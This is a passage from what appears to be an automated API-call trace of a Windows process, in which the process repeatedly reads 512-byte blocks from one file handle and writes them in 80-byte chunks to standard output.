lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.103] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.103] GetFileType (hFile=0x4c) returned 0x1 [0107.103] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.103] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.103] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.103] GetFileType (hFile=0x4c) returned 0x1 [0107.103] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.103] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.103] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.103] GetFileType (hFile=0x4c) returned 0x1 [0107.103] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.103] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.103] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.103] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.103] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.103] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.103] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.103] GetFileType (hFile=0x4c) returned 0x1 [0107.104] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.104] GetFileType (hFile=0x4c) returned 0x1 [0107.104] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.104] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.104] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.104] GetFileType (hFile=0x4c) returned 0x1 [0107.104] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.104] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.104] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.104] GetFileType (hFile=0x4c) returned 0x1 [0107.104] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.104] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.104] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.104] GetFileType (hFile=0x4c) returned 0x1 [0107.104] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.104] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.104] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.104] GetFileType (hFile=0x4c) returned 0x1 [0107.104] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.104] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.104] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.104] GetFileType (hFile=0x4c) returned 0x1 [0107.104] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.104] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.104] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.104] GetFileType (hFile=0x4c) returned 0x1 [0107.105] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.105] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.105] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.105] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.105] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.105] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.105] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.105] GetFileType (hFile=0x4c) returned 0x1 [0107.105] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.105] GetFileType (hFile=0x4c) returned 0x1 [0107.105] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.105] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.105] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.105] GetFileType (hFile=0x4c) returned 0x1 [0107.105] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.105] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.105] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.105] GetFileType (hFile=0x4c) returned 0x1 [0107.105] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.105] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.105] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.105] GetFileType (hFile=0x4c) returned 0x1 [0107.105] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.105] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.105] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.105] GetFileType (hFile=0x4c) returned 0x1 [0107.106] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.106] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.106] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.106] GetFileType (hFile=0x4c) returned 0x1 [0107.106] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.106] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.106] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.106] GetFileType (hFile=0x4c) returned 0x1 [0107.106] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.106] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.106] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.106] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.106] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.106] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.106] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.106] GetFileType (hFile=0x4c) returned 0x1 [0107.106] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.106] GetFileType (hFile=0x4c) returned 0x1 [0107.106] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.106] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.106] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.106] GetFileType (hFile=0x4c) returned 0x1 [0107.106] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.106] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.107] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.107] GetFileType (hFile=0x4c) returned 0x1 [0107.107] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.107] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.107] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.107] GetFileType (hFile=0x4c) returned 0x1 [0107.107] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.107] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.107] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.107] GetFileType (hFile=0x4c) returned 0x1 [0107.107] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.107] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.107] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.107] GetFileType (hFile=0x4c) returned 0x1 [0107.107] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.107] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.107] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.107] GetFileType (hFile=0x4c) returned 0x1 [0107.107] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.107] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.107] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.107] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.107] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.107] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.108] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.108] GetFileType (hFile=0x4c) returned 0x1 [0107.108] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.108] GetFileType (hFile=0x4c) returned 0x1 [0107.108] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.108] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.108] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.108] GetFileType (hFile=0x4c) returned 0x1 [0107.108] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.108] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.108] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.108] GetFileType (hFile=0x4c) returned 0x1 [0107.108] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.108] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.108] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.108] GetFileType (hFile=0x4c) returned 0x1 [0107.108] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.108] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.108] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.108] GetFileType (hFile=0x4c) returned 0x1 [0107.108] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.108] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.108] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.108] GetFileType (hFile=0x4c) returned 0x1 [0107.108] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.109] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.109] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.109] GetFileType (hFile=0x4c) returned 0x1 [0107.109] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.109] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.109] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.109] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.109] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.109] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.109] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.109] GetFileType (hFile=0x4c) returned 0x1 [0107.109] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.109] GetFileType (hFile=0x4c) returned 0x1 [0107.109] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.109] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.109] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.109] GetFileType (hFile=0x4c) returned 0x1 [0107.109] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.109] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.109] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.109] GetFileType (hFile=0x4c) returned 0x1 [0107.109] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.109] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.109] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.110] GetFileType (hFile=0x4c) returned 0x1 [0107.110] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.110] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.110] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.110] GetFileType (hFile=0x4c) returned 0x1 [0107.110] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.110] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.110] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.110] GetFileType (hFile=0x4c) returned 0x1 [0107.110] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.110] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.110] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.110] GetFileType (hFile=0x4c) returned 0x1 [0107.110] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.110] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.110] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.110] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.110] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.110] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.110] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.110] GetFileType (hFile=0x4c) returned 0x1 [0107.110] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.110] GetFileType (hFile=0x4c) returned 0x1 [0107.110] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.110] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.111] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.111] GetFileType (hFile=0x4c) returned 0x1 [0107.111] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.111] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.111] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.111] GetFileType (hFile=0x4c) returned 0x1 [0107.111] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.111] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.111] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.111] GetFileType (hFile=0x4c) returned 0x1 [0107.111] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.111] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.111] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.111] GetFileType (hFile=0x4c) returned 0x1 [0107.111] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.111] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.111] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.111] GetFileType (hFile=0x4c) returned 0x1 [0107.111] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.111] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.111] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.111] GetFileType (hFile=0x4c) returned 0x1 [0107.111] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.111] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.112] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.112] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.112] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.112] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.112] GetFileType (hFile=0x4c) returned 0x1 [0107.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.112] GetFileType (hFile=0x4c) returned 0x1 [0107.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.112] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.112] GetFileType (hFile=0x4c) returned 0x1 [0107.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.112] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.112] GetFileType (hFile=0x4c) returned 0x1 [0107.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.112] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.112] GetFileType (hFile=0x4c) returned 0x1 [0107.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.112] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.112] GetFileType (hFile=0x4c) returned 0x1 [0107.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.112] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.112] GetFileType (hFile=0x4c) returned 0x1 [0107.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.112] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.113] GetFileType (hFile=0x4c) returned 0x1 [0107.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.113] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.113] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.113] 